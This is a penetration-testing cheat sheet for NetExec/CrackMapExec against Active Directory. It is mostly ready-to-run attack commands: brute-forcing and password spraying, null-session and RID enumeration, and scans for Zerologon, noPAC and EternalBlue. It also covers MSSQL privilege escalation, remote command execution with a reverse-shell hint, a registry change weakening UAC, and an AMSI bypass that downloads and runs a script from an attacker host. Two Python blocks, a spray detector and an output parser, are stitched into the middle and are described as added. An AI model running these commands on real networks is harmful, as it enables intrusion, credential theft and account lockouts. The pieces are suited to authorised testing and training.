NetExec/CrackMapExec
CrackMapExec (CME) is an open-source post-exploitation tool commonly used by security professionals, penetration testers, and red teamers for network reconnaissance and lateral movement. It's particularly focused on networks that use the Windows Active Directory (AD) environment.
CrackMapExec, originally created by @byt3bl33d3r in 2015, was archived in September 2023 after years of maintenance by @mpgn_x64 and contributors. Due to challenges with community contributions and codebase discrepancies, active contributors transitioned to NetExec (nxc), a fully open-source, community-driven successor. NetExec ensures regular updates, seamless contributions, and continued development for all users.
Documentation: NetExec Wiki
We can use either one, as CrackMapExec also works fine for most use cases. In this note, I will alternate between the names—sometimes referring to it as NetExec (nxc) and other times as CrackMapExec (cme).
NetExec Installation
sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
NetExec Menu
nxc -h
nxc smb -h # Protocol Specific Help
nxc winrm -L # List Available Modules
nxc winrm -M <module_name> --options # List Options for particular modules
Supported Protocols
NetExec currently supports remote authentication and operations using the following protocols: MSSQL, SMB, SSH, WinRM, WMI, VNC, LDAP, RDP, NFS, and FTP.
Example Use
General Use
nxc <protocol> <targetIP> -u <user or user_wordlist> -p <password or password_wordlist>
Example
nxc winrm 10.10.10.10 -u users.txt -p passwords.txt
A [+] in the output means the credentials were accepted; (Pwn3d!) means they were accepted with administrative privileges on the target.
Target Enumeration
nxc <protocol> 10.10.10.10 # Single target
nxc <protocol> 10.10.10.10 10.10.10.20 10.10.10.30 # Multiple Target
nxc <protocol> 192.168.1.0/24 # CIDR Range
nxc <protocol> rezydev.local # Domain Name
nxc <protocol> target_list.txt # Target list file
Bruteforcing AD Accounts
When brute-forcing an AD account, it is important to use precise usernames and passwords to avoid being blocked by the domain group policy. Refer to the following module to generate possible usernames or passwords:
Password And Usernames Mutations
nxc smb 10.10.10.10 -u wordlist.txt -p wordlist.txt
Lockout policy configuration by the domain admin can result in the targeted account being locked out during this attack.
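The lockout note above is the defender's side of the same behaviour: a spray or brute-force run shows up in the domain controller's Security log as one source failing against many different accounts in a short window, followed by 4740 lockout events once the threshold is hit. The following Python is an added example (not part of this note and not NetExec code) that runs two such heuristics over constructed log records; the records, the field names, the 5-users-in-10-minutes threshold and the lockout threshold of 3 are all assumptions chosen for the demonstration, not values from any real policy.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log records (not real telemetry), trimmed to the fields
# the heuristics use. Event 4625 = failed logon, 4740 = account locked out.
# Status 0xC000006A = wrong password, 0xC0000234 = account already locked out.
SAMPLE_EVENTS = [
    # one source trying a single password against many accounts in two minutes
    {"id": 4625, "time": "2024-05-01T09:00:00", "ip": "10.10.10.50", "user": "alice", "status": "0xC000006A"},
    {"id": 4625, "time": "2024-05-01T09:00:07", "ip": "10.10.10.50", "user": "bob",   "status": "0xC000006A"},
    {"id": 4625, "time": "2024-05-01T09:00:15", "ip": "10.10.10.50", "user": "carol", "status": "0xC000006A"},
    {"id": 4625, "time": "2024-05-01T09:00:22", "ip": "10.10.10.50", "user": "dave",  "status": "0xC000006A"},
    {"id": 4625, "time": "2024-05-01T09:00:30", "ip": "10.10.10.50", "user": "erin",  "status": "0xC000006A"},
    {"id": 4625, "time": "2024-05-01T09:01:40", "ip": "10.10.10.50", "user": "frank", "status": "0xC000006A"},
    # a user mistyping their own password twice from their workstation: not a spray
    {"id": 4625, "time": "2024-05-01T09:05:00", "ip": "10.10.10.77", "user": "grace", "status": "0xC000006A"},
    {"id": 4625, "time": "2024-05-01T09:05:20", "ip": "10.10.10.77", "user": "grace", "status": "0xC000006A"},
    # carol is tried again after crossing the lockout threshold, and 4740 is logged
    {"id": 4625, "time": "2024-05-01T09:02:00", "ip": "10.10.10.50", "user": "carol", "status": "0xC0000234"},
    {"id": 4740, "time": "2024-05-01T09:02:00", "ip": "10.10.10.50", "user": "carol", "status": ""},
]


def detect_spray(events, min_users=5, window=timedelta(minutes=10)):
    """Map source IP -> sorted distinct target accounts for every source whose
    failed logons touched at least `min_users` distinct accounts inside one window.
    A sliding window over the time-sorted attempts keeps this linear per source."""
    by_ip = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_ip[e["ip"]].append((datetime.fromisoformat(e["time"]), e["user"]))
    hits = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        start = 0
        for end, (t_end, _) in enumerate(attempts):
            while t_end - attempts[start][0] > window:
                start += 1
            if len({u for _, u in attempts[start:end + 1]}) >= min_users:
                hits[ip] = sorted({u for _, u in attempts})
                break
    return hits


def failures_per_account(events):
    """Count failed logons per account, regardless of source."""
    counts = defaultdict(int)
    for e in events:
        if e["id"] == 4625:
            counts[e["user"]] += 1
    return dict(counts)


def accounts_near_lockout(events, threshold, margin=1):
    """Accounts whose failure count is within `margin` of the lockout
    threshold, or already past it: the ones to expect 4740 events for next."""
    return sorted(u for u, n in failures_per_account(events).items() if n >= threshold - margin)


def locked_out(events):
    """Accounts with a 4740 (account locked out) event."""
    return sorted({e["user"] for e in events if e["id"] == 4740})


if __name__ == "__main__":
    print("spray sources:", detect_spray(SAMPLE_EVENTS))
    print("near lockout (threshold 3):", accounts_near_lockout(SAMPLE_EVENTS, threshold=3))
    print("locked out:", locked_out(SAMPLE_EVENTS))
```

The `min_users` and `window` values need tuning per environment; the point of the example is the shape of the signal (many distinct accounts, one source, short span), which is exactly what a wordlist-versus-wordlist run produces and what the lockout policy is there to punish.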
User Enumeration
# Credentialed
nxc smb 10.10.10.10 -u "rezydev" -p "Password123@" --users
nxc smb 10.10.10.10 -u "rezydev" -p "Password123@" --users | grep -oP '(?<=\\)[^ \t:]+'
# SMB NULL Session
nxc smb rezydev.local -u "" -p "" --users | awk '{print $4}' | uniq
# LDAP Anonymous
nxc ldap 10.10.10.10 --users
# Rid Bruteforce
nxc smb rezydev.local -u "" -p "" --rid-brute
Group Enumeration
# Need NULL/Anonymous Sessions or Valid Credentials
nxc smb 10.10.10.10 -u "rezydev" -p "Password123@" --groups
# Use '--groups Administrators' to list all members in that group
# Query Group Membership with nxc modules
nxc ldap dc01.rezydev.local -u "rezydev" -p "Password123@" -M groupmembership -o USER=jethalal
Password Policy
# Credentialed
nxc smb 10.10.10.10 -u "rezydev" -p "Password1" --pass-pol
# Without Credentials
nxc ldap 10.10.10.10 --anon --pass-pol
Password Spraying
# Domain Joined Account
nxc smb 10.10.10.10 -u usernamelist.txt -p Password123@
# We can grep for '+' to find valid ones.
# Local Account
nxc smb --local-auth 192.168.5.0/24 -u administrator -H <HASH>
# NOTE: --local-auth will prevent account lockout, so always use it when
# playing with admin accounts.
# We can use '--continue-on-success' to test all accounts.
# Using LDAP Protocol
nxc ldap dc01.rezydev.local -u "rezydev" -p "Password123@" # FQDN is required
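Grepping for '+' (and for Pwn3d!) works, but once a spray covers several hosts and protocols it helps to parse the result lines properly and separate valid logins, admin logins, lockouts and accounts that need a password change. The following Python is an added example, not part of this note and not NetExec code; the sample output is constructed in the column layout nxc prints (protocol, host, port, hostname, [+]/[-], domain\user:secret, optional status or Pwn3d!), and the host, domain and account names are made up.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample in the layout of nxc result lines (not captured output).
SAMPLE_OUTPUT = r"""
SMB         10.10.10.10     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:rezydev.local) (signing:True) (SMBv1:False)
SMB         10.10.10.10     445    DC01             [+] rezydev.local\rezydev:Password123@ (Pwn3d!)
SMB         10.10.10.10     445    DC01             [-] rezydev.local\bob:Password123@ STATUS_LOGON_FAILURE
SMB         10.10.10.10     445    DC01             [-] rezydev.local\carol:Password123@ STATUS_ACCOUNT_LOCKED_OUT
SMB         10.10.10.10     445    DC01             [-] rezydev.local\dave:Password123@ STATUS_PASSWORD_MUST_CHANGE
SMB         10.10.10.10     445    DC01             [+] rezydev.local\erin:Password123@
"""

# One result line: "<PROTO> <host> <port> <name> [+|-] <domain>\<user>:<secret> [status | (Pwn3d!)]"
# Banner/info lines ("[*]") and module output do not match and are skipped.
LINE_RE = re.compile(
    r"^(?P<proto>[A-Z]+)\s+(?P<host>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+"
    r"\[(?P<mark>[+-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<secret>\S+)"
    r"(?:\s+(?P<rest>.*\S))?\s*$"
)


@dataclass
class AuthResult:
    protocol: str
    host: str
    domain: str
    user: str
    valid: bool   # "[+]": credentials accepted
    admin: bool   # "(Pwn3d!)": accepted with admin rights on the host
    status: str   # NT status on failure (e.g. STATUS_LOGON_FAILURE), "" on success


def parse_line(line: str) -> Optional[AuthResult]:
    """Parse one nxc line into an AuthResult, or None if it is not a result line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rest = m.group("rest") or ""
    valid = m.group("mark") == "+"
    status = "" if valid or not rest else rest.split()[0]
    return AuthResult(
        protocol=m.group("proto"), host=m.group("host"), domain=m.group("domain"),
        user=m.group("user"), valid=valid, admin=valid and "Pwn3d!" in rest, status=status,
    )


def triage(output: str) -> dict:
    """Bucket every result line of an nxc run: who is valid, who is admin,
    who got locked out by the spray, and who must change their password."""
    results = [r for r in map(parse_line, output.splitlines()) if r]
    return {
        "valid": sorted(f"{r.domain}\\{r.user}" for r in results if r.valid),
        "admin": sorted(f"{r.domain}\\{r.user}@{r.host}" for r in results if r.admin),
        "locked_out": sorted(r.user for r in results if r.status == "STATUS_ACCOUNT_LOCKED_OUT"),
        "must_change": sorted(r.user for r in results if r.status == "STATUS_PASSWORD_MUST_CHANGE"),
        "failed": sum(1 for r in results if not r.valid),
    }


if __name__ == "__main__":
    for bucket, value in triage(SAMPLE_OUTPUT).items():
        print(f"{bucket}: {value}")
```

Feed it a saved run (for example `nxc smb targets.txt -u users.txt -p Password123@ --continue-on-success | tee spray.log`) and the locked_out bucket is the one to watch: every entry there is a user who now cannot log in, which is the cost the lockout note earlier in this page warns about.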
More Enumeration Flags
We can use these flags for further enumeration if we have a valid domain account.
SMB
| Switch | Description |
|---|---|
| --loggedon-users | Lists users currently logged into the target machine. |
| --sessions | Displays active SMB sessions on the target. |
| --disks | Enumerates mounted disks or volumes on the target system. |
| --computers | Lists computer accounts in the domain (useful in domain recon). |
| --wmi | Executes a custom WMI query on the target system. |
| --wmi-namespace | Specifies a WMI namespace to use (default: root\cimv2). |
| --rid-brute | Brute-forces RIDs to enumerate local/domain user accounts on the target. |
| --local-groups or --domain-groups | Lists local groups; if a group is specified, shows its members. [--domain-groups only works against a Domain Controller] |
| --shares | Enumerates available SMB shares and associated permissions. |
| --users | Lists domain users retrieved from the target system. |
| --groups | Lists domain groups in the target domain. |
| --pass-pol | Retrieves the domain's password policy (e.g., min length, complexity). |
LDAP
| Switch | Description |
|---|---|
| --users | Enumerates all enabled domain user accounts. |
| --groups | Lists all domain groups in the directory. |
| --password-not-required | Retrieves users with the PASSWD_NOTREQD flag (users not required to have passwords). |
| --trusted-for-delegation | Lists users and computers with the TRUSTED_FOR_DELEGATION flag set. |
| --admin-count | Identifies objects with adminCount=1 (typically protected/high-privilege accounts). |
| --get-sid | Retrieves the Security Identifier (SID) of the domain. |
| --gmsa | Enumerates Group Managed Service Accounts (GMSA) and retrieves their passwords. |
RDP
| Switch | Description |
|---|---|
| --nla-screenshot | Takes a screenshot of the RDP login screen if Network Level Authentication (NLA) is disabled. |
| --screenshot | Captures a screenshot of the desktop after a successful RDP connection. |
| --screentime <time> | Time (in seconds) to wait before taking a screenshot after RDP login. |
| --res <WIDTHxHEIGHT> | Sets the screen resolution for the RDP session (default: 1024x768). |
Vulnerability Scan
# Zerologon Scan
nxc smb 10.10.10.10 -M zerologon
# PetitPotam
nxc smb 10.10.10.10 -M petitpotam
# noPAC
nxc smb 10.10.10.10 -u 'rezydev' -p "Coolpass123@" -M nopac
# DFSCoerce
nxc smb 10.10.10.10 -u 'rezydev' -p "Coolpass123@" -M dfscoerce
# ShadowCoerce
nxc smb 10.10.10.10 -u 'rezydev' -p "Coolpass123@" -M shadowcoerce
# MS17-010 or EternalBlue
nxc smb 10.10.10.10 -M ms17-010
STATUS_PASSWORD_MUST_CHANGE
If you get STATUS_PASSWORD_MUST_CHANGE when trying to access an account, you can use Impacket's smbpasswd to change its password and access the account.
# Trying to access gives STATUS_PASSWORD_MUST_CHANGE
nxc smb 10.10.10.10 -u "rezydev" -p "OldPassword123@"
# Use smbpasswd
smbpasswd -r 10.10.10.10 -U rezydev
# Authenticate again with new credentials
nxc smb 10.10.10.10 -u "rezydev" -p "NewPassword123@"
MSSQL Enumeration & Attacks
If we gather a user with database admin or MSSQL permissions, or just a SQL service account, we can use NetExec/CrackMapExec to enumerate and attack remotely. There are various ways, but NetExec/CrackMapExec makes life easier.
If we see (Pwn3d!) it means that the account is Database Admin.
Execute Queries
nxc mssql 10.10.10.10 -u rezydev -p 'Password123@' -q "SELECT name FROM master.dbo.sysdatabases"
nxc mssql 10.10.10.10 -u rezydev -p 'Password123@' -q "QUERY HERE"
# If the account is a SQL Server login (SQL authentication) rather than a Windows/domain account, add the '--local-auth' flag.
Execute Windows Commands
# Execute Windows Commands
nxc mssql 10.10.10.10 -u "sqlsvc" -p 'Password123@' --local-auth -x "whoami"
nxc mssql 10.10.10.10 -u "sqlsvc" -p 'Password123@' --local-auth -x "revshells.com powershell (#3)"
Privilege Escalation Module
NetExec's mssql_priv module helps escalate MSSQL user privileges to sysadmin. It checks two methods: EXECUTE AS LOGIN and the db_owner role. The module has three options:
- enum_privs (default): list privileges
- privesc: escalate
- rollback: revert changes
# List Options
nxc mssql -M mssql_priv --options
# Check if user 'rezydev' can impersonate sysadmin
nxc mssql 10.10.10.10 -u "rezydev" -p "Password123@" -M mssql_priv
# If yes, use option 'privesc' to escalate and now rezydev is also sysadmin
nxc mssql 10.10.10.10 -u "rezydev" -p "Password123@" -M mssql_priv -o ACTION=privesc
# Since above command made our user sysadmin, we can now use -x to execute commands
# as sysadmin user.
# We can also use '-o ACTION=rollback' to revert previous action.
Command Execution
Domain Account
If we have domain account credentials, we can use -x (for cmd) and -X (for PowerShell) without having to worry about UAC.
Local Account
Only the user with RID 500 (i.e. the built-in Administrator) can execute remote commands when authenticating with a local account. To allow other local administrators to execute commands as well, we can change a registry value:
nxc smb 10.10.10.10 -u 'Administrator' -p 'AdminPass123@' --local-auth -x "reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
We can still run commands using the winrm protocol, though, if we are a member of the local Administrators group or the Remote Management Users group, or if we have been granted PowerShell Remoting permissions.
AMSI Bypass
We can also use a custom AMSI bypass instead of the default one used by -X for PowerShell.
nxc smb 10.10.10.10 -u 'rezydev' -p 'Pass123@' -X '$PSVersionTable' --amsi-bypass amsibypass.txt
# Content of amsibypass.txt:
IEX(New-Object Net.WebClient).DownloadString('http://TUN0-IP/bypass-ps1-script-amsi.ps1');
# Host the 'bypass-ps1-script-amsi.ps1' script using a Python HTTP server. This is done to
# avoid the 'Command exceeds maximum length' error.
We can also use ssh protocol with netexec to execute commands.